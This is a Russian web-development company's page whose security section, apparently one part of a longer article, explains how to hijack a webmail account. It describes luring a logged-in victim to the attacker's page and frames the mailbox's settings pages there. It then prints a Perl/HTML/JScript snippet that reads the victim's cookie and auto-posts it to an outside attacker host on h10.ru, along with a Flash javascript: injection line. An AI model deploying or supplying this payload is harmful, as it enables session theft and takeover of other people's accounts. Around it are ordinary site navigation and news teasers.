Разработка динамических сайтов
SEO услуги
Управление контекстной рекламой

Вход на хостинг

Имя пользователя:*

Пароль пользователя:*

IT-новости

20.04.2016 iPhone 2017 года поместят в водонепроницаемый корпус из стекла

Линейка iPhone в новом году серьезно поменяется. В этом уверен аналитический исследователь Мин Чи Ку......

подробнее

30.07.2015 Ищем уникальный контент для сайта

Ищем уникальный контент для сайта Без уникального контента Ваш сайт обречен на то, что его страницы......

подробнее

11.05.2015 Распространённые ошибки разработчиков сайтов

Не секрет, что в сети Интернет насчитывается миллионы сайтов, и каждый день появляются тысячси новых......

подробнее

Безопасность

Самый обычный вариант аутентификации, используемый на большинстве крупных сайтов: при входе на страницу пользователь аутентифицируется парой логин/пароль, после чего создается сессия, которая ограничивается либо закрытием браузера, либо временем. Сессия может привязываться к IP.

Вы думаете тут ничего не поделать? У таких крупных систем обычно существует система восстановления паролей. А сценарий взлома, например, почтового ящика будет выглядеть так: посылаем жертве письмо с ссылкой на свою страничку, либо используем Flash/Action Script –> JScript:

GetUrl(”javascript:alert(“123”);”);

При получении почты у жертвы создана сессия, в это время жертве доступны все параметры ящика для чтения (кроме пароля). Таким образом жертва, зайдя на вашу страницу, сама того не зная, открывает в фреймах странички с параметрами, при этом отправляя их содержимое вам же. Это несложно реализуется примерно следующим скриптом (написанным на Perl), который вызывается из фрейма:

(для cookie)

print <<OPA;

<form action="http://yourpage.h10.ru/cgi-bin/securecheck.pl" method="POST"

name="forma">

<input type=hidden name=hin>

</form>

<script language="jscript">

onload=function () {

    setTimeout(

        function () {

document.forma.hin.value=document.getElementById("oVictim").document.cookie;

document.forma.submit();

        },

        100

    );

}

</script>


Предыдущая страницаОглавлениеСледующая страница
 
[001] [002] [003] [004] [005] [006] [007] [008] [009] [010] [011] [012] [013] [014] [015] [016] [017] [018] [019] [020]
[021] [022] [023] [024] [025] [026] [027] [028] [029] [030] [031] [032] [033] [034] [035] [036] [037] [038] [039] [040]
[041] [042] [043] [044] [045] [046] [047] [048] [049] [050] [051] [052] [053] [054] [055] [056] [057] [058] [059] [060]
[061] [062] [063] [064] [065] [066] [067] [068] [069] [070] [071] [072] [073] [074] [075] [076] [077] [078] [079] [080]
[081] [082] [083] [084] [085] [086] [087] [088] [089] [090] [091] [092] [093] [094] [095] [096] [097] [098] [099] [100]
[101] [102] [103] [104] [105] [106] [107] [108] [109] [110] [111] [112] [113] [114] [115] [116] [117] [118] [119] [120]
[121] [122] [123] [124] [125] [126] [127] [128] [129] [130] [131] [132] [133] [134] [135] [136] [137] [138] [139] [140]
[141] [142] [143] [144] [145] [146] [147] [148]

+7 (831) 413-63-27
ООО Дельта-Технология ©2007 - 2016 год
Нижний Новгород, ул. Дальняя, 17А.
Rambler's Top100